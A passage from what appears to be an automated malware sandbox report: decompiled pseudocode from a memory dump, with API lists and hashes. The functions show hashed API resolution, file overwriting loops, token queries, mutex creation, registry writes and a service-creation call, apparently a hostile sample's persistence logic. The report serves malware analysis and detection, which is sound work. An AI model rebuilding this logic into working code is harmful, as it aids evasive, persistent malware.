    				_t28 = _t26 & 0xffffff00 | _t32 == 0x00000000;
    				_t20 = E00804C00(_a12, 0);
    				_t41 = _t39 + 8;
    				if((_t28 & _t20) != 0 || ((_t28 ^ _t20) & 0x00000001) != 0) {
    					L4:
    					_t27 = 1;
    					goto L7;
    				} else {
    					E0081F5C0(0, 0xabb2b5);
    					_t41 = _t41 + 8;
    					_t25 = WriteFile(_t34, _t32, _a12,  &_v20, 0); // executed
    					if(_t25 == 0) {
    						_t27 = 0;
    						__eflags = 0;
    						L7:
    						_t21 = E0081F5C0(0, 0xb8e7db5);
    						_t39 = _t41 + 8;
    						 *_t21(_t34);
    						_t48 = _t27;
    						if(_t27 == 0) {
    							E00821520(_t48, _a4);
    							_t39 = _t39 + 4;
    						}
    						goto L9;
    					}
    					goto L4;
    				}
    			}

    APIs
    • CreateFileW.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 00820E4F
    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 00820E92
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: File$CreateWrite
    • String ID:
    • API String ID: 2263783195-0
    • Opcode ID: 999aa03f46c901ad06438117db62f6388a5a315142f2943780357ccab4bc23c2
    • Instruction ID: dde34d0b7871d3dc3135a98a82efd310021d7b8707dfcfdee6f80733e7c30eac
    • Opcode Fuzzy Hash: 999aa03f46c901ad06438117db62f6388a5a315142f2943780357ccab4bc23c2
    • Instruction Fuzzy Hash: 6D11E9A6B802143AEA5025A47C43FBF3608FF51759F090430FE09D92C3F9A29D9445B3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E0080EE40(WCHAR* _a4) {
    				void* _t4;
    				signed char _t5;
    				long _t7;
    				intOrPtr* _t11;
    				intOrPtr* _t13;
    				void* _t16;
    				intOrPtr* _t17;
    				void* _t19;
    				WCHAR* _t20;
    				void* _t21;
    				void* _t23;
    				void* _t25;
    				void* _t26;
    
    				_t19 = 0;
    				_t20 = _a4;
    				while(1) {
    					E0081F5C0(0, 0xad68947);
    					_t4 = CreateFileW(_t20, 0x40000000, 7, 0, 2, 0x4000000, 0); // executed
    					_t21 = _t4;
    					_t5 = E00805BF0(_t4, 0);
    					_t25 = _t23 + 0x10;
    					if((_t5 & 0x00000001) == 0) {
    						_t17 = E0081F5C0(0, 0xb8e7db5);
    						_t25 = _t25 + 8;
    						 *_t17(_t21);
    					}
    					E0081F5C0(0, 0xbf8ba27);
    					_t26 = _t25 + 8;
    					_t7 = GetFileAttributesW(_t20); // executed
    					if(_t7 == 0xffffffff) {
    						break;
    					}
    					_t11 = E0081F5C0(0, E00808AE0(0x2f8ba8b));
    					 *_t11(_t20);
    					_t13 = E0081F5C0(0, 0x7a2bc0);
    					 *_t13(E00808AE0(0x82ef134));
    					_t19 = _t19 + 1;
    					_t16 = E00808AE0(0x82efa86);
    					_t23 = _t26 + 0x1c;
    					if(_t19 != _t16) {
    						continue;
    					}
    					break;
    				}
    				E008046C0(_t20);
    				return 0;
    			}

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000002,04000000,00000000), ref: 0080EE72
    • GetFileAttributesW.KERNEL32(?), ref: 0080EEA7
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: File$AttributesCreate
    • String ID:
    • API String ID: 415043291-0
    • Opcode ID: 9100399d9617e8eec24611d169c1ba32c767716f30ed273cb76e94e3330459cb
    • Instruction ID: 98a6918cc8d7efdb0a81a1569acc11046f5ec6c60348ae677ff60b82948d1ea5
    • Opcode Fuzzy Hash: 9100399d9617e8eec24611d169c1ba32c767716f30ed273cb76e94e3330459cb
    • Instruction Fuzzy Hash: 55113CA6B8421436F46035B87C47FBF250CEB62B6AF140531FE5AE52C3F992695500B7
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0080FBA0(intOrPtr _a4, void* _a8) {
    				void* _v20;
    				intOrPtr _v24;
    				long _v28;
    				intOrPtr* _t13;
    				void* _t14;
    				void* _t16;
    				union _TOKEN_INFORMATION_CLASS _t21;
    				long _t22;
    				void* _t30;
    				void* _t31;
    				void* _t32;
    				void* _t33;
    
    				_v28 = 0;
    				_v20 = 0;
    				_t13 = E0081F5C0(9, 0xf2b7ebe);
    				_t32 = _t31 + 8;
    				_t14 =  *_t13(_a4, 8,  &_v20);
    				_t37 = _t14;
    				if(_t14 == 0) {
    					_t30 = 0;
    					__eflags = 0;
    				} else {
    					_t16 = E0081CD10(_t14, _t37, _v20); // executed
    					_t33 = _t32 + 4;
    					_t30 = _t16;
    					if(_a8 != 0 && _t30 != 0 && 1 != 0) {
    						_v24 = E0081F5C0(9, 0xbd557e);
    						_t21 = E00808AE0(0x82efa80);
    						_t22 = E00808AE0(0x82efa88);
    						_t33 = _t33 + 0x10;
    						if(GetTokenInformation(_v20, _t21, _a8, _t22,  &_v28) == 0) {
    							E008046C0(_t30);
    							_t33 = _t33 + 4;
    							_t30 = 0;
    						}
    					}
    					E0081F5C0(0, 0xb8e7db5);
    					FindCloseChangeNotification(_v20); // executed
    				}
    				return _t30;
    			}
















    APIs
      • Part of subcall function 0081CD10: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,?,?,?,?,00000000), ref: 0081CD51
      • Part of subcall function 0081CD10: GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0081CD99
    • GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 0080FC32
      • Part of subcall function 008046C0: RtlFreeHeap.NTDLL(00000000,0080EF06,?,?,?), ref: 008046EC
    • FindCloseChangeNotification.KERNEL32(00000000), ref: 0080FC56
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: InformationToken$ChangeCloseFindFreeHeapNotification
    • String ID:
    • API String ID: 2311446219-0
    • Opcode ID: d68a7e83c23518c89a32501aa381eeb008a61606e5296508a325230dcf522666
    • Instruction ID: 5ce5b56e22c3cfa4dc69a57c515c5223614cc5a17f5fee192f700153c81a1fea
    • Opcode Fuzzy Hash: d68a7e83c23518c89a32501aa381eeb008a61606e5296508a325230dcf522666
    • Instruction Fuzzy Hash: A611E072E001296BEB50AAA45C07BFF7628FF11749F044030FE09E6282F6B15904C6F3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0081CD10(void* __eax, void* __eflags, void* _a4) {
    				long _v20;
    				signed int _t8;
    				int _t11;
    				intOrPtr* _t13;
    				void* _t15;
    				int _t17;
    				DWORD* _t19;
    				void* _t20;
    				void* _t22;
    				void* _t23;
    				void* _t26;
    
    				_v20 = 0;
    				_t8 = E00808AE0(0x82efa85);
    				E0081F5C0(_t8, E00808AE0(0x893aff2));
    				_t26 = _t23 + 0x10;
    				_t19 =  &_v20;
    				_t11 = GetTokenInformation(_a4, 1, 0, 0, _t19); // executed
    				_t22 = 0;
    				if(_t11 == 0) {
    					_t13 = E0081F5C0(0, 0xc702be2);
    					_t26 = _t26 + 8;
    					if( *_t13() == 0x7a) {
    						_t15 = E0081D310(_v20);
    						_t26 = _t26 + 4;
    						if(_t15 != 0) {
    							_t20 = _t15;
    							E0081F5C0(9, 0xbd557e);
    							_t26 = _t26 + 8;
    							_t17 = GetTokenInformation(_a4, 1, _t20, _v20, _t19); // executed
    							_t22 = _t20;
    							if(_t17 == 0) {
    								E008046C0(_t20);
    								_t26 = _t26 + 4;
    								_t22 = 0;
    							}
    						}
    					}
    				}
    				return _t22;
    			}















    APIs
    • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,?,?,?,?,00000000), ref: 0081CD51
      • Part of subcall function 0081D310: RtlAllocateHeap.NTDLL(009A0000,00000000,00810659,?,?,?,?), ref: 0081D353
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    • GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0081CD99
      • Part of subcall function 008046C0: RtlFreeHeap.NTDLL(00000000,0080EF06,?,?,?), ref: 008046EC
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: HeapInformationToken$AllocateFreeLibraryLoad
    • String ID:
    • API String ID: 4190244075-0
    • Opcode ID: 35a95335d0a60428c9f8e326201e8b9f588e861faf6b1d9a124cd406a9a807ae
    • Instruction ID: eab18625b94471089333b72b8fa9718f3fc7611c8afbdb423c266293a05f4f48
    • Opcode Fuzzy Hash: 35a95335d0a60428c9f8e326201e8b9f588e861faf6b1d9a124cd406a9a807ae
    • Instruction Fuzzy Hash: 1401C8B2A802253FEA507AA8BC43FAF395DEF91758F040430FD08E5182F5929D5441A3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E008066F0(void* __eflags, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
    				void* _t14;
    				signed char _t15;
    				long _t17;
    				long _t21;
    				intOrPtr* _t22;
    				signed int _t27;
    				int _t28;
    
    				_t15 = E008128A0(_t14, __eflags, 0xffffffff);
    				E0081F5C0(9, 0x7b43ce7);
    				_t17 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, (_t15 & 0x000000ff) << 0x00000008 | 0x00000002, 0,  &_a4, 0); // executed
    				if((E00804C00(_t17, 0) & 0x00000001) == 0) {
    					_t27 = 0;
    					__eflags = 0;
    				} else {
    					_t28 = _a16;
    					E0081F5C0(9, 0xdd270b7);
    					_t21 = RegSetValueExW(_a4, _a12, 0, _t28, _a20, _a24); // executed
    					_t27 = _t28 & 0xffffff00 | _t21 == 0x00000000;
    					_t22 = E0081F5C0(9, 0x3111c69);
    					 *_t22(_a4);
    				}
    				return _t27;
    			}











    APIs
    • RegCreateKeyExW.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?), ref: 0080672F
    • RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00806763
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: CreateLibraryLoadValue
    • String ID:
    • API String ID: 3939425971-0
    • Opcode ID: edd5973851b5213e5fa7eb243f7f54231e00b0b324a0513fd1c84321d5db07f4
    • Instruction ID: 5a15e51bfa78b678968d8408b362273b3947682d5235fb841aa303bfd0efda02
    • Opcode Fuzzy Hash: edd5973851b5213e5fa7eb243f7f54231e00b0b324a0513fd1c84321d5db07f4
    • Instruction Fuzzy Hash: F50196B6A803147FEA105E95AC43FDB3B1CEF55769F140121FF18A61C2E5A1BA2581F2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00816880(void* __eflags, void* _a4, short* _a8, short* _a12) {
    				void* _t9;
    				long _t12;
    				signed int _t14;
    				signed int _t15;
    				intOrPtr* _t17;
    				int _t22;
    				signed int _t23;
    
    				_t22 = (E008128A0(_t9, __eflags, 0xffffffff) & 0x000000ff) << 0x00000008 | 0x00000001;
    				E0081F5C0(9, 0xda29a27);
    				_t12 = RegOpenKeyExW(_a4, _a8, 0, _t22,  &_a4); // executed
    				if(_t12 == 0) {
    					E0081F5C0(9, 0x8097c7);
    					_t14 = RegQueryValueExW(_a4, _a12, 0, 0, 0, 0); // executed
    					__eflags = _t14;
    					_t7 = _t14 == 0;
    					__eflags = _t7;
    					_t23 = _t22 & 0xffffff00 | _t7;
    					_t15 = E00808AE0(0x82efa85);
    					_t17 = E0081F5C0(_t15, E00808AE0(0xb3fe6e5));
    					 *_t17(_a4);
    				} else {
    					_t23 = 0;
    				}
    				return _t23;
    			}











    APIs
    • RegOpenKeyExW.KERNEL32(00000000,80000001,00000000,00000000,?,?,?,?), ref: 008168B7
    • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 008168DF
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: OpenQueryValue
    • String ID:
    • API String ID: 4153817207-0
    • Opcode ID: 52cb92c72305e1b0ee1a577faa3b09caab4cda29b255efd2d5341c206a6b8321
    • Instruction ID: 86bfe8c122e913c06826e550bb1465693b56dd0211a363c09c82887cc0ce5bd3
    • Opcode Fuzzy Hash: 52cb92c72305e1b0ee1a577faa3b09caab4cda29b255efd2d5341c206a6b8321
    • Instruction Fuzzy Hash: 1401DDB2A403153BEA106A996C43FEB3A0CFF41769F140135FE58D61C2F991AA5541F7
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00821580(void** _a4) {
    				int _t4;
    				int _t7;
    				void** _t9;
    				void* _t10;
    
    				_t9 = _a4;
    				if( *_t9 != 0) {
    					E0081F5C0(0, 0xb1fd105);
    					_t10 = _t10 + 8;
    					_t4 = VirtualFree( *_t9, 0, 0x8000); // executed
    				}
    				if(_t9[2] != 0) {
    					E0081F5C0(0, E00808AE0(0x3a08739));
    					_t7 = FindCloseChangeNotification(_t9[2]); // executed
    					return _t7;
    				}
    				return _t4;
    			}








    APIs
    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?), ref: 008215A4
    • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 008215C7
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: ChangeCloseFindFreeNotificationVirtual
    • String ID:
    • API String ID: 560371109-0
    • Opcode ID: ed43cb352e3f1780bab2b8b75c082ce65ccdd9d70744ace9ee51fbe1a8b7cff0
    • Instruction ID: c72768312863590c202fa13e3931155a576633d56af4e5c0aa46400d0176c449
    • Opcode Fuzzy Hash: ed43cb352e3f1780bab2b8b75c082ce65ccdd9d70744ace9ee51fbe1a8b7cff0
    • Instruction Fuzzy Hash: 5FE09231A80210BAE5202E98FC07B95768CFF11746F144435FA8EA11D2EAA129D085A3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 51%
    			E008010E0(intOrPtr* _a4, intOrPtr _a8) {
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v72;
    				intOrPtr* _t22;
    				void* _t23;
    				intOrPtr* _t25;
    				void* _t26;
    				void* _t28;
    				intOrPtr* _t30;
    				void* _t31;
    				intOrPtr* _t32;
    				void* _t33;
    				intOrPtr* _t34;
    				intOrPtr* _t36;
    				void* _t37;
    				intOrPtr* _t38;
    				void* _t40;
    				void* _t41;
    				intOrPtr* _t42;
    				intOrPtr _t47;
    				intOrPtr _t48;
    				void* _t49;
    				void* _t52;
    				void* _t53;
    				void* _t54;
    				void* _t55;
    				void* _t57;
    
    				_t47 = _a8;
    				_t22 = E0081F5C0(9, 0xc654d62);
    				_t53 = _t52 + 8;
    				_t23 =  *_t22(_t47, 1);
    				_t48 = 0;
    				if(_t23 != 0) {
    					_t25 = E0081F5C0(9, 0x4a9139c);
    					_t54 = _t53 + 8;
    					_t26 =  *_t25(_t47, 1, 0, 0);
    					_t60 = _t26;
    					if(_t26 != 0) {
    						_t42 = _a4;
    						_v20 = 0;
    						_t49 = E0080D910(_t60);
    						_t28 = E00808AE0(0x82efa8e);
    						_t55 = _t54 + 4;
    						if(_t49 <= _t28) {
    							__eflags = _t49 - 2;
    							if(_t49 != 2) {
    								goto L10;
    							} else {
    								_t30 = E0081F5C0(9, 0xabc78f7);
    								_t55 = _t55 + 8;
    								_t31 =  *_t30(0x8240c8, 1,  &_v20, 0);
    								__eflags = _t31;
    								if(_t31 == 0) {
    									goto L10;
    								} else {
    									goto L7;
    								}
    							}
    						} else {
    							_t38 = E0081F5C0(9, 0xabc78f7);
    							_t40 = E0080F180(0x823850,  &_v72);
    							_t55 = _t55 + 0x10;
    							_t41 =  *_t38(_t40, 1,  &_v20, 0); // executed
    							if(_t41 != 0) {
    								L7:
    								_v32 = 0;
    								_v28 = 0;
    								_v24 = 0;
    								_t32 = E0081F5C0(9, 0x8a8238c);
    								_t57 = _t55 + 8;
    								_t33 =  *_t32(_v20,  &_v28,  &_v32,  &_v24);
    								__eflags = _t33;
    								if(_t33 == 0) {
    									L9:
    									_t34 = E0081F5C0(0, 0x982abe5);
    									_t55 = _t57 + 8;
    									 *_t34(_v20);
    									goto L10;
    								} else {
    									_t36 = E0081F5C0(9, 0x4a8239c);
    									_t55 = _t57 + 8;
    									_t37 =  *_t36(_t47, _v28, _v32, _v24);
    									__eflags = _t37;
    									if(_t37 == 0) {
    										goto L9;
    									}
    								}
    							} else {
    								L10:
    								_v20 = 0xffffffff;
    							}
    						}
    						if(_t42 != 0) {
    							 *_t42 = E00808AE0(0x82efa80);
    							 *((intOrPtr*)(_t42 + 4)) = _t47;
    							 *((intOrPtr*)(_t42 + 8)) = 0;
    						}
    						_t48 = _v20;
    					}
    				}
    				return _t48;
    			}

































    APIs
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000), ref: 00801177
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: DescriptorSecurity$ConvertLibraryLoadString
    • String ID:
    • API String ID: 3927295052-0
    • Opcode ID: c83502bf4d06da82f4ccbfa8bf5e03a6cd91517402c6bb1adfb86a926535f143
    • Instruction ID: 751849fc82f8c9fb1b76ff7b3f30f0d1aafc44dd528daa720035004594e0db78
    • Opcode Fuzzy Hash: c83502bf4d06da82f4ccbfa8bf5e03a6cd91517402c6bb1adfb86a926535f143
    • Instruction Fuzzy Hash: 49318671E403167AEF10AAE49C47FFF7A68FF11754F040524FA18F61C2FAB15A4586A2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0080DBE0(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, signed char _a20, signed char _a24) {
    				signed int _v20;
    				char _v540;
    				void* _t15;
    				long _t19;
    				intOrPtr* _t21;
    				void* _t22;
    				void* _t23;
    				signed int _t24;
    				char* _t25;
    				void* _t26;
    				void* _t28;
    
    				_t23 = 0;
    				_v20 = _a24 & 0x000000ff;
    				_t24 = _a20 & 0x000000ff;
    				_t25 =  &_v540;
    				do {
    					E0081ACA0(_t29, _a4, _t25, _t24, _v20);
    					_t15 = E00821490(_a12, _a8, _t25);
    					_t28 = _t26 + 0x1c;
    					if(_t15 == 0) {
    						goto L2;
    					}
    					if(_a16 == 0) {
    						L1:
    						E0081F5C0(0, 0xbf8ba27);
    						_t28 = _t28 + 8;
    						_t19 = GetFileAttributesW(_a12); // executed
    						__eflags = _t19 - 0xffffffff;
    						if(__eflags == 0) {
    							return 1;
    						}
    						goto L2;
    					}
    					_t21 = E0081F5C0(3, 0xd85c117);
    					_t28 = _t28 + 8;
    					_t22 =  *_t21(_a12, _a16);
    					_t32 = _t22;
    					if(_t22 != 0) {
    						goto L1;
    					}
    					L2:
    					E00806CC0(_t32, _t23, 1);
    					_t26 = _t28 + 8;
    					_t23 = _t23 + 1;
    					_t29 = _t23 - 0x64;
    				} while (_t23 != 0x64);
    				return 0;
    			}















    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: f05560868fedb1448af9294bd871f517b9e2f3fabd48d693ebe11c3c2d23554f
    • Instruction ID: 6fa99e53641b343a32050703c897a7b1bf8543229a80d0f8f1679a76e7b013a7
    • Opcode Fuzzy Hash: f05560868fedb1448af9294bd871f517b9e2f3fabd48d693ebe11c3c2d23554f
    • Instruction Fuzzy Hash: E31108759403196AEF512EA4AC06FFA3B29FF11359F040520FD68E12D3F2778974D6A2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E00816F40(void* __eax, void* __ecx, void* __edx, void* __eflags, char _a4) {
    				char _v17;
    				intOrPtr _v24;
    				char _v62;
    				char _v100;
    				char _v192;
    				char _v1232;
    				char _v1748;
    				void* _t31;
    				void* _t33;
    				void* _t34;
    				signed int _t36;
    				intOrPtr* _t38;
    				void* _t40;
    				void* _t42;
    				intOrPtr _t43;
    				void* _t44;
    				void* _t45;
    				void* _t48;
    				signed int _t49;
    				intOrPtr* _t51;
    				intOrPtr _t54;
    				void* _t55;
    				void* _t56;
    				void* _t57;
    				intOrPtr* _t58;
    				intOrPtr* _t59;
    				void* _t65;
    				void* _t66;
    				char* _t67;
    				void* _t74;
    				void* _t85;
    				void* _t86;
    				void* _t88;
    				void* _t90;
    				void* _t91;
    				void* _t92;
    				void* _t93;
    				void* _t95;
    				void* _t97;
    				void* _t100;
    				void* _t103;
    				void* _t109;
    				void* _t110;
    				void* _t111;
    				void* _t112;
    				void* _t117;
    				void* _t118;
    
    				_push(__eax);
    				_t85 = __edx;
    				_t65 = __ecx;
    				_v17 = _a4;
    				_t91 = L0080E190(E00808AE0(0x82efa90));
    				E00822550(_t26);
    				L00821AE0(_t91, _t65);
    				_t3 = _t91 + 0xc; // 0xc
    				L00821AE0(_t3, _t85);
    				 *((char*)(_t91 + 0x18)) = _v17;
    				_t31 = E008103C0(0xffffffff); // executed
    				_t100 = _t97 + 0xc;
    				if(_t31 != 4) {
    					E0081F5C0(0, 0xa0733d4);
    					_t33 = CreateThread(0, 0, E00816130, _t91, 0, 0); // executed
    					return _t33;
    				} else {
    					_t74 = _t91;
    					_t103 = _t100 + 4;
    					_pop(_t92);
    					_pop(_t86);
    					_pop(_t66);
    					_pop(_t95);
    					_t93 = _t74;
    					_t34 = E00822160(_t74 + 0xc);
    					_t67 =  &_v1748;
    					E00809A50(_t67, _t34, 0xffffffff);
    					_t36 = E00808AE0(0x82efa8f);
    					_t38 = E0081F5C0(_t36, E00808AE0(0xdc4644b));
    					 *_t38(_t67, _t92, _t86, _t66, _t95);
    					_t40 = E008103C0(0xffffffff);
    					_t109 = _t103 - 0x6c4 + 0x20;
    					if(_t40 != 4) {
    						_t42 = E0080F180(0x823570,  &_v192);
    						_t110 = _t109 + 8;
    						_t88 = _t42;
    						if( *((char*)(_t93 + 0x18)) == 0) {
    							_t43 = E0080FD10(_t67);
    							_t111 = _t110 + 4;
    							_v24 = _t43;
    							_t44 = E00822160(_t93);
    							_push(_v24);
    							_push(_t67);
    						} else {
    							_t48 = E0080AAF0(E0080F180(0x8236c0,  &_v100),  &_v1232, 0x208, _t47, _t67);
    							_t111 = _t110 + 0x18;
    							_t44 = E00822160(_t93);
    							_push(_t48);
    							_push( &_v1232);
    						}
    						_push(_t44);
    						_push(_t88);
    						_push(0x80000001);
    						_t45 = E008105A0();
    						_t112 = _t111 + 0x14;
    					} else {
    						_t49 = E00808AE0(0x82efa85);
    						_t51 = E0081F5C0(_t49, E00808AE0(0xaacb94b));
    						_t112 = _t109 + 0x10;
    						_t45 =  *_t51(0, 0, 2);
    						if(_t45 != 0) {
    							_t90 = _t45;
    							if( *((char*)(_t93 + 0x18)) == 0) {
    								E00809A50( &_v1232, _t67, 0xffffffff);
    								_t117 = _t112 + 0xc;
    							} else {
    								_v24 = E0080F180(0x8236c0,  &_v62);
    								E0080AAF0(E00808AE0(0x82ef884),  &_v1232, _t63, _v24, _t67);
    								_t117 = _t112 + 0x1c;
    							}
    							_t54 = E0081F5C0(9, 0x42453f7);
    							_t118 = _t117 + 8;
    							_v24 = _t54;
    							_t55 = E00822160(_t93);
    							_t56 = E00822160(_t93);
    							_t57 = _v24(_t90, _t56, _t55, 0xf01ff, 0x110, 2, 0,  &_v1232, 0, 0, 0, 0, 0);
    							if(_t57 != 0) {
    								_t59 = E0081F5C0(9, 0x48eed75);
    								_t118 = _t118 + 8;
    								 *_t59(_t57);
    							}
    							_t58 = E0081F5C0(9, 0x48eed75);
    							_t112 = _t118 + 8;
    							_t45 =  *_t58(_t90);
    						}
    					}
    					return _t45;
    				}
    			}



















































    APIs
    • CreateThread.KERNEL32(00000000,00000000,Function_00016130,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00816FC0
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: CreateThread
    • String ID:
    • API String ID: 2422867632-0
    • Opcode ID: 9342b1e02029ba6f6d2d1d1de385d4d8069e679115443a7ff3ae9b44cdbd93b8
    • Instruction ID: 5181c09d37706f69a783077f968b41d358c86bcf7dba4cf6b46257fa7b2199db
    • Opcode Fuzzy Hash: 9342b1e02029ba6f6d2d1d1de385d4d8069e679115443a7ff3ae9b44cdbd93b8
    • Instruction Fuzzy Hash: 42012466B4426036E92021AC3C03BAF6A5CDF916B4F140075F95FCA2C3E891A59582B3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E0081E460(void* __eflags, struct _SECURITY_ATTRIBUTES* _a4, WCHAR* _a8, intOrPtr _a12) {
    				void* _t8;
    				signed char _t9;
    				intOrPtr* _t12;
    				intOrPtr* _t16;
    				void* _t20;
    				void* _t22;
    
    				E0081F5C0(0, E00808AE0(0x6caeedb));
    				_t8 = CreateMutexW(_a4, 0, _a8); // executed
    				_t20 = _t8;
    				_t9 = E00805BF0(_t8, 0);
    				_t22 = 0;
    				if((_t9 & 0x00000001) == 0) {
    					_t12 = E0081F5C0(0, E00808AE0(0x8571068));
    					_push(_a12);
    					_push(_t20);
    					if(( !( *_t12()) | 0x00000080) == 0xffffffff) {
    						_t22 = _t20;
    					} else {
    						_t16 = E0081F5C0(0, 0xb8e7db5);
    						 *_t16(_t20);
    					}
    				}
    				return _t22;
    			}










    APIs
    • CreateMutexW.KERNEL32(?,00000000,0082518C,?,?,?), ref: 0081E488
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: CreateLibraryLoadMutex
    • String ID:
    • API String ID: 427046056-0
    • Opcode ID: 91020c1a335dd3756830b3ae3c336ffb03f4358b1400049a81a868a468f7676d
    • Instruction ID: da17a3ab254e58e94f617bd0baf669688898cf6c90e6ba4e28fef5b40415c0cc
    • Opcode Fuzzy Hash: 91020c1a335dd3756830b3ae3c336ffb03f4358b1400049a81a868a468f7676d
    • Instruction Fuzzy Hash: 67F081A6A4061477E56035A82C43FBF260CFFA2B6AF140032FE5DE6282E951A95501F7
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 45%
    			E0081D3B0(intOrPtr _a4, intOrPtr _a8) {
    				void* _t9;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				void* _t15;
    
    				_t12 = _a8;
    				_t22 = _t12;
    				if(_t12 == 0) {
    					return 0;
    				}
    				_t13 = _a4;
    				_t3 = _t12 - 0x3a80a221; // -973047337
    				_t15 = E00806CC0(_t22, _t3, 4) + 0x3a80a221;
    				E00806CC0(_t22, _t12, 4);
    				if(_t13 == 0) {
    					E0081F5C0(0, 0x8685de3);
    					_push(_t15);
    				} else {
    					E0081F5C0(0, E00808AE0(0xf451af));
    					_push(_t15);
    					_push(_t13);
    				}
    				_push(8);
    				_t9 = RtlReAllocateHeap( *0x827a70); // executed
    				return _t9;
    			}








    APIs
    • RtlReAllocateHeap.NTDLL(00000008,-3A80A221,?,?,?,?,?,00000000,?,?,?), ref: 0081D420
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 07e9e1be4baa3850b0725b65b92f9367933d362c621985d769088b6c93bcde60
    • Instruction ID: 05226d9fbe567ed3dba56ad69f3d35699e4f25a7e3c0a875981dc5db02afa143
    • Opcode Fuzzy Hash: 07e9e1be4baa3850b0725b65b92f9367933d362c621985d769088b6c93bcde60
    • Instruction Fuzzy Hash: C4F0FC62A8431477E55065957C47FDB360CFF5176EF040031FE0DE5282F462795942B2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0081D310(intOrPtr _a4) {
    				void* _t3;
    				void* _t6;
    				void* _t7;
    				intOrPtr _t8;
    
    				_t8 = _a4;
    				if(_t8 == 0) {
    					return 0;
    				}
    				_t3 = E00808AE0(0x82efa88);
    				E0081F5C0(0, 0x8685de3);
    				_t7 =  *0x827a70; // 0x9a0000
    				_t6 = RtlAllocateHeap(_t7, E00808AE0(0x82efa84), _t8 + _t3); // executed
    				return _t6;
    			}








    APIs
    • RtlAllocateHeap.NTDLL(009A0000,00000000,00810659,?,?,?,?), ref: 0081D353
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 7ec293bc81744a985f2a5f1d127cebe3ff5312bd3e9af5c901c590fd1ba4bc8c
